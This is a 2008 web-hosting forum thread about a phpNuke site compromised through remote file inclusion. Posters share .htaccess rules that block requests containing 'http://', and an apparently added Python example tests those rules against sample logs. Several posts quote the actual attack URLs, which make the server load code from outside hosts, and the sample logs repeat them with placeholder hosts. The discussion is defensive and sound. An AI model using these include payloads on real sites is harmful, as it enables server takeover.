Ravens PHP Scripts: Forums
Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.5.x
zeromechanic
Hangin' Around


Joined: Dec 15, 2005
Posts: 40
Location: Netherlands

Posted: Mon Jan 21, 2008 7:27 pm

Probably a weak point in Sentinel or a patch.

A site was hacked, using phpNuke 7.6pl3.* AND NukeSentinel 2.5.15.

This is the link they used: w.drunkenmastersguild.eu/modules/admin/admin.php?root=http://boludalnet.freehostia.com/57.gif?%22

Unfortunately the user of the site deleted all of his access logs.
This is all that's left.
I asked the hoster if they can find anything in the server logs.

upgradedb.sql and the folder nsnst_installer in the screenshot were not on the server.
Also not in a backup file!

Site is now replaced with the latest RN and NS,
waiting for them to try again.

Thanks, Zeromechanic

Screenshot: [image]
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

Posted: Mon Jan 21, 2008 8:10 pm

This looks strange - but you should first be very careful about what and how much information you post on a public site (no need to give more script kiddies an invitation).

I doubt it's a problem with Sentinel or a patch. Does the site have admin authentication on admin.php?
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

Posted: Mon Jan 21, 2008 10:07 pm

I was just looking at your posting and puzzling too. Sentinel specifically looks for the "http" in a query string while it is filtering out XSS attacks and it should have found the one you posted. But then I looked at the address bar and it shows Coppermine. I've never used the product and can't testify from experience, but from what I've seen on these forums over the years, it introduces a number of security holes. That may be responsible for what you saw.
slackervaara
Worker


Joined: Aug 26, 2007
Posts: 236

Posted: Tue Jan 22, 2008 1:10 am

I use these lines added in .htaccess to avoid cross scripting by hackers and it works very well:

Code:
RewriteEngine On

RewriteCond %{QUERY_STRING} .*http:\/\/.* [OR]
RewriteCond %{QUERY_STRING} .*http%3A%2F%2F.*
RewriteRule ^.* - [F]
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6792
Location: Ha Noi, Viet Nam

Posted: Tue Jan 22, 2008 3:28 am

You would need to determine if 'script blocking' was actually turned on in the NukeSentinel configuration.
Nuke Sentinel should have stopped that particular attack in any event BUT only if the relevant blocker is turned on.
The path suggests the attack originated from a compromised Coppermine gallery - again!
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

Posted: Tue Jan 22, 2008 10:27 am

I don't recognize the module being attacked:
modules/admin/admin.php?root=

There is no such admin module in standard phpNuke.
Do you have a backup of the affected site somewhere (not public of course)?
zeromechanic
Posted: Wed Jan 23, 2008 12:01 am

Indeed Coppermine, but what I see is that it's "included" in index.php?http://..........

They gained access with the first link, and used the "Coppermine" to access FTP, or something like that.

No serious damage was done, BTW.

I also thought that NS would block these strings. But good one about the "activating" of the blocker;
didn't think about that.

There should be a backup of the site, but the database I don't know.
evaders99
Posted: Wed Jan 23, 2008 12:16 am

Well index.php? itself with no parameters should not be exploitable either, unless there was some weird code already there.

I don't mind looking at your backups, if you think it was indeed patched up-to-date.
 
zeromechanic
Posted: Wed Jan 23, 2008 4:17 pm

Thanks,
all blockers were activated.

There is a backup, but not from the "hacked" site but from before the hack.

I will send the contact from the hosting to this topic.
 
evaders99
Posted: Wed Jan 23, 2008 6:31 pm

Send it to me by Private Message, you probably don't want it out-in-the-open.
The access logs would help, if you still had some references to them. But I guess since you said they were deleted, they are probably gone.
 
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

Posted: Thu Jan 24, 2008 11:15 am

slackervaara wrote:
I use these lines added in .htaccess to avoid cross scripting by hackers and it works very well:

RewriteEngine On

RewriteCond %{QUERY_STRING} .*http:\/\/.* [OR]
RewriteCond %{QUERY_STRING} .*http%3A%2F%2F.*
RewriteRule ^.* - [F]


BTW, these do not work for me. I have a script which notifies me when certain error codes are "hit" and the above should be stopping ALL of these query string [link] stuff from dropping into nuke at all.

Are you certain these are working for you? Are you on Apache 2.x by chance?
evaders99
Posted: Thu Jan 24, 2008 6:01 pm

%{QUERY_STRING} fails for me .. I end up using %{THE_REQUEST}
 
slackervaara
Posted: Thu Jan 24, 2008 9:24 pm

It seems to work for me at least. My test server is XAMPP 1.6.4 with Apache 2.2.6, but I don't know the Apache version of my web hotel; I think it's older.

When I tested on my test server I got a 403 Forbidden error when trying cross scripting, but no such error without this in .htaccess.

After I added this to my .htaccess on the web hotel, Sentinel has not been activated by cross scripting despite daily attempts according to the logs.
 
montego
Posted: Fri Jan 25, 2008 7:40 am

evaders99, thank you, thank you, thank you! I get hundreds of these attempts per day caught by a script of mine and so I should very quickly see if this stops them cold. I did test it just now and it seems to work finally. THANKS!
 
evaders99
Posted: Fri Jan 25, 2008 2:41 pm

I get hundreds of attempts too ;)
Now if I only had a filter for POST data, then I really could run everything in .htaccess rules
 
warren-the-ape
Worker


Joined: Nov 19, 2007
Posts: 196
Location: Netherlands

Posted: Fri Jan 25, 2008 4:50 pm

evaders99 wrote:
%{QUERY_STRING} fails for me .. I end up using %{THE_REQUEST}


Code:
RewriteEngine On

RewriteCond %{THE_REQUEST} .*http:\/\/.* [OR]
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.*
RewriteRule ^.* - [F]


Hey, that seems to work pretty nicely; thanks to both of you for sharing :D
Btw, are there any major differences between using 'QUERY_STRING' or 'THE_REQUEST'?
Gremmie
Former Moderator in Good Standing


Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

Posted: Fri Jan 25, 2008 7:04 pm

So this stops the query before Sentinel even sees it, right? Are there any legitimate cases where you would have http: in a GET query that this blocks?
slackervaara
Posted: Fri Jan 25, 2008 7:12 pm

I have had it for months on my system and I check the logs on a daily basis, but I have not yet found any legitimate case that has been blocked by this.
 
montego
Posted: Sat Jan 26, 2008 5:59 am

Gremmie wrote:
So this stops the query before Sentinel even sees it, right? Are there any legitimate cases where you would have http: in a GET query that this blocks?


Yes there is, but these functions are rarely used and there are work-arounds. For example, testing a submitted web link or download. There are other admin functions like these as well.

But, again, I'd rather stop these before even getting to php... ;)

BTW, Thanks again Evaders! You were right on the money with that change. THE_REQUEST has essentially killed around 80 notifications that I would have gotten...
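The rules quoted in this thread test one Apache variable against a regex and answer 403 ([F]) on a match. To make warren-the-ape's question (QUERY_STRING versus THE_REQUEST) and montego's point about legitimate link-checking requests concrete, here is an added Python example; it is not code from the thread, from NukeSentinel or from Apache. It replays the two patterns against constructed access-log lines the way mod_rewrite would see them: %{THE_REQUEST} is the whole request line ("GET /path?query HTTP/1.1"), so it also matches a remote URL that sits in the path rather than after the "?", and the pattern as posted is case-sensitive unless the [NC] flag is added. The log lines, the IP addresses, the attacker.example and example.org hosts and the /links-check.php path are all constructed placeholders.

```python
import re

# Equivalent of the thread's two RewriteCond patterns.  Apache regexes are
# case-sensitive unless the [NC] flag is given, so both variants are kept.
STRICT_RE = re.compile(r"http://|http%3A%2F%2F")               # rule as posted
NC_RE = re.compile(r"http://|http%3A%2F%2F", re.IGNORECASE)    # same rule with [NC]

# Apache "combined" log line: only the quoted request line matters here.
REQUEST_LINE_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)"'
)

# Constructed sample log lines (RFC 5737 documentation addresses and
# placeholder hostnames, not real sites).  Line 1 mirrors the attempt quoted
# in the thread, line 4 carries the remote URL in the path instead of the
# query, line 5 is the kind of legitimate link check montego mentions.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Jan/2008:03:58:01 -0600] "GET /modules.php?name=News&file=article&sid=13//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://attacker.example/id.txt? HTTP/1.1" 403 0
203.0.113.7 - - [26/Jan/2008:04:02:11 -0600] "GET /modules/admin/admin.php?root=HTTP%3a%2f%2fattacker.example/57.gif? HTTP/1.1" 200 512
198.51.100.9 - - [26/Jan/2008:04:05:42 -0600] "GET /modules.php?name=Forums&file=viewtopic&t=12 HTTP/1.1" 200 8193
198.51.100.9 - - [26/Jan/2008:04:06:03 -0600] "GET /http://example.org/index.php HTTP/1.1" 404 221
198.51.100.12 - - [26/Jan/2008:04:09:30 -0600] "GET /links-check.php?url=http://example.org/ HTTP/1.1" 200 1024
"""


def apache_vars(line):
    """Return (THE_REQUEST, QUERY_STRING) as mod_rewrite would see them for one
    log line, or None if the line carries no request line.  THE_REQUEST is the
    full request line; QUERY_STRING is only the part of the target after the
    first '?' (empty when there is none)."""
    m = REQUEST_LINE_RE.search(line)
    if not m:
        return None
    the_request = f"{m['method']} {m['target']} {m['proto']}"
    query_string = m["target"].partition("?")[2]
    return the_request, query_string


def would_block(line, variable="THE_REQUEST", nocase=False):
    """True if 'RewriteCond %{variable} <pattern>' followed by
    'RewriteRule ^.* - [F]' would have answered this request with 403."""
    parts = apache_vars(line)
    if parts is None:
        return False
    subject = parts[0] if variable == "THE_REQUEST" else parts[1]
    pattern = NC_RE if nocase else STRICT_RE
    return pattern.search(subject) is not None


def blocked_targets(log_text, variable="THE_REQUEST", nocase=False):
    """Request targets from an access log that the rule would have rejected,
    in log order."""
    hits = []
    for line in log_text.splitlines():
        if would_block(line, variable, nocase):
            hits.append(REQUEST_LINE_RE.search(line)["target"])
    return hits


if __name__ == "__main__":
    # Compare the four combinations over the constructed log.
    for var in ("QUERY_STRING", "THE_REQUEST"):
        for nc in (False, True):
            print(f"{var:12} [NC]={str(nc):5}", blocked_targets(SAMPLE_LOG, var, nc))
```

Run over the constructed log, QUERY_STRING catches lines 1 and 5, THE_REQUEST additionally catches line 4 (the URL is in the path, so QUERY_STRING is empty), and only the [NC] variant catches line 2, whose encoding is upper/lower-case mixed. Line 5 is blocked in every combination, which is the trade-off montego describes: a link-check or download-test feature that passes a URL in the query string stops working unless it is excluded from the rule.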
 
zeromechanic
Posted: Sat Jan 26, 2008 3:58 pm

With RN and NS .15 installed,
already stopped 58 hacking attempts.
Filter

This is the link they are trying:
w*w.drunkenmastersguild.eu/modules.php?name=News&file=article&sid=13//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://party4you.ch/new/id.txt?
 
Dawg
RavenNuke(tm) Development Team


Joined: Nov 07, 2003
Posts: 910

Posted: Sat Jan 26, 2008 6:15 pm

I have been HAMMERED by that one all night....
montego
Posted: Sun Jan 27, 2008 8:20 am

Put these rewrite statements in your .htaccess (you may have to turn the rewrite engine on) as was mentioned above and these all disappear! I was literally getting upwards of hundreds. After putting those in, ZERO of these attacks are getting to PHP.

Code:
RewriteCond %{THE_REQUEST} .*http:\/\/.* [OR]
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.*
RewriteRule ^.* - [F]
 
redhairz
Worker


Joined: Nov 17, 2006
Posts: 222

Posted: Thu Feb 21, 2008 3:28 am

Many thanks to all of you. I am not so sure that this will work on mine, but what the heck :)) Thanks to the experts here.

But my rewrite rule is this; can it work?
Code:
RewriteRule ^.*$ http://127.0.0.1 [R,L]
evaders99
Posted: Thu Feb 21, 2008 7:43 am

Sure, the redirect will just bounce the request back to the user. - (hyphen) will just kill further processing with no response. Either way is fine.
 
redhairz
Posted: Tue Feb 26, 2008 2:13 am

Thanks evaders, I just wanted to stop their silly act. :)
 
Powered by phpBB © 2001-2007 phpBB Group